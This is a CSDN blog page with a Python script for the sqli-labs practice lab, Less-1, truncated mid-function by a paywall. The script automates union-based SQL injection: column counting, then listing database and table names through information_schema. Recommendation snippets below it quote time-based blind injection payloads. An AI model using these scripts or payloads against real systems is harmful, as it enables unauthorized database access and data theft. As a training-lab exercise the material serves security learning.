sqli-labs Less-1、Less-9\Less-15 python脚本

最新推荐文章于 2023-03-08 15:58:00 发布
最新推荐文章于 2023-03-08 15:58:00 发布
阅读量1.1k 收藏 5
点赞数 6
分类专栏: web python 文章标签: python less sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChamZhiZe/article/details/122074944
版权

虽然这个很简单,但是还是写个脚本跑一下

Less-1

from http.client import PROCESSING, responses
from re import I, T
from typing import FrozenSet
from bs4.dammit import xml_encoding
from bs4.element import ProcessingInstruction
import requests
import urllib.request
from colorama import init, Fore, Back, Style
from requests.api import get
import bs4
import lxml

# payload = 'abcdefghijklmnopqrstuvwxyz~!@#$%^&*()<>?|,./`'






'''打开网页'''
def send_request(url):
    res = urllib.request.urlopen(url+ '--+')
    result = str(res.read().decode('utf-8'))
    # print(result)   打印源码

    return result



'''order by 查看注入点'''
def order_by_N(url):
    flag = 0
    for i in range(1,101):
        # print(i)
        sql = url + 'order by ' +str(i) + '--+'
        # print(i)
        result = requests.get(sql)
        # result1= send_request( url + 'order by ' +str(i) + '--+')
        # print(result) 打印200 状态码
        # print(sql) 打印SQL语句
        soup = bs4.BeautifulSoup(result.content,'lxml')
        # print(soup.prettify())
        content = soup.find(size = '3')

        # print(str(content.text))
        a='Login' in str(content.text)
        # print(a)
        if a == True:
            flag = i
            print(i)
        elif a == False:
            break
    print("检测到注入点"+str(i-1))
    return flag

'''获得数据库名称'''

def get_database(sql_url):
    sql_database=sql_url+'union select 1,2,group_concat(schema_name) from information_schema.schemata --+'
    print("[正在执行SQL语句:]"+sql_database)
    result = requests.get(sql_database)
    soup = bs4.BeautifulSoup(result.content,'lxml')
    content = soup.find(size = '5')    
    print("爆破结果如下:"+content.text)

# 打印出来了 数据库


'''爆破数据库'''

def get_table(sql_url):
    I = input("请输入想要注入的数据库:")
    sql_table = sql_url+ " union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = '%s' --+"  %I
    print("[正在执行SQL语句:]"+sql_table)
    result = requests.get(sql_table)
    soup = bs4.BeautifulSoup(result.content,'lxml')
    content = soup.find(size = '5')
    print("爆破结果如下:"+content.text)
# 打印出来 表的列表


# '''爆破数据库的表'''
# def get_column(sql_url):
    J = input("请输入想要查看到表:")
    sql_column= sql_url+ "union select 1,2,group_concat(column_nam
最低0.47元/天 解锁文章
tutou_hao
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
sqli-labs第九关延迟注入脚本
weixin_42750666的博客
04-01 664
import requests import string def timeOut(url): #判断是否延时 try: res=requests.get(url,timeout=3) return "No" except Exception as e: return "TimeOut" def get_dbNa...
Sqli-labs less 9
weixin_34049032的博客
08-11 160
Less-9 本关我们从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。 这里用sleep()函数。 这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写payload了:(正确的时候直接返回,不正确的时候等待5秒钟,只贴正确的) 猜测数据库: http://127.0.0.1/...
sqli-labs-less-15
qq_45106794的博客
10-18 244
#sqli-labs-less-15 不管用’ " ') ") 都没显错,所以猜测得用时间盲注 所以进行尝试 admin’ or if(ascii(substr(database(),1,1))=115,1,sleep(5))–+ admin’ or if(ascii(substr(database(),2,1))=15,1,sleep(5))–+ admin’ or if(left(...
sqli-labs ————less -15
Fly_鹏程万里
05-11 902
Less-15源代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xmlns="http://www.w3.org/1999/xhtml"&gt; &lt;head&gt..
Sqli-Labs:Less-1
weixin_44227437的博客
05-04 345
sqli-1 基于错误_GET_单引号_字符型注入 0x01:判断是字符型注入还是数字型注入
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
【针对sqli-labs第9关的时间盲注python脚本
AA8j的博客
09-09 706
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
sql-lib Less-9 python实现
weixin_43745072的博客
11-22 302
转载请注明出处 Less-9 Less-9是一个盲注的,因为无论注入正确与否,返回的信息都是相同的。那么参考下Less-9的题目,我们可以看到,考虑基于时间的盲注。其原理主要是使用if函数,对字符串特定位置判断,为真就不操作,反之sleep(5) 首先查询表名。这里通过改变substr中下一个字符的值"`1",以及对应的字符的值125。如果if判断的条件为真,那么就是字符匹配,就沉睡5s反之直接执行下一个字符匹配。 1' union select 1,If(ascii(substr(databa
SQL注入漏洞测试(布尔盲注)python
weixin_45445398的博客
03-08 436
打开题目后,显然使用order by 判断列数 select 1,2,3,4 发现错误没有回显(有回显的参照我之前发的)这时候就开始爆破数据库了(我使用手动+py脚本sqlmap更方便这里练习就使用py)得到列名 name password status,后就是爆破里面的数据。输出得到mozhe mozhe,同样的将name换成password后得到。当判断数据库长度为1时页面错误看源码不断实验发现数据库名长度为10。得到数据库名stormgroup,之后开始爆破表个数,表长和表名。
sqli-labs 通关教程 Less 9 (时间盲注)
一期一会的博客
12-08 2672
利用正常的语句测试没有任何效果 http://127.0.0.1/sqlilabs/Less-9/?id=1 http://127.0.0.1/sqlilabs/Less-9/?id=1'-- - 数据完成交互后目标网站没有任何的页面回显,这个时候可以使用时间盲注。 http://127.0.0.1/sqlilabs/Less-9/?id=1' and if(1=1,sleep(3),1)-- - //沉睡 http://127.0.0.1/sqlilabs/Less-9/?id=1 a.
sqli-labs-master闯关游戏第九关
FourthGuy的博客
10-09 2126
文章目录前言一、Less-9分析下源码中的函数总结 前言 本题用到了在第八关介绍的两个函数 ascii()和substring(),和两个新的函数sleep(),if() 大家第一次接触后一定要反复练习,并且思考为什么要这么做 一、Less-9 惯例,我们先写以下语句 ?id=1 接着 ?id=1' ?id=1" 发现返回的资源都是上面的样子 猜想可能是关闭了报错,且无论语句正确与否返回的结果都是相同的 我们尝试基于时间的注入 这里介绍两个函数 sleep()参数写数字,此函数用于将时间延迟.
sqli靶场通关之less9
sunxueer的博客
07-19 1228
sqli less9 时间盲注 结合burpsuite 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。 1. 求闭合字符 id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了 查看源码,证实了猜测,尝试使用时间盲注 id=1 and sleep(5) //未延迟 i
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tutou_hao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值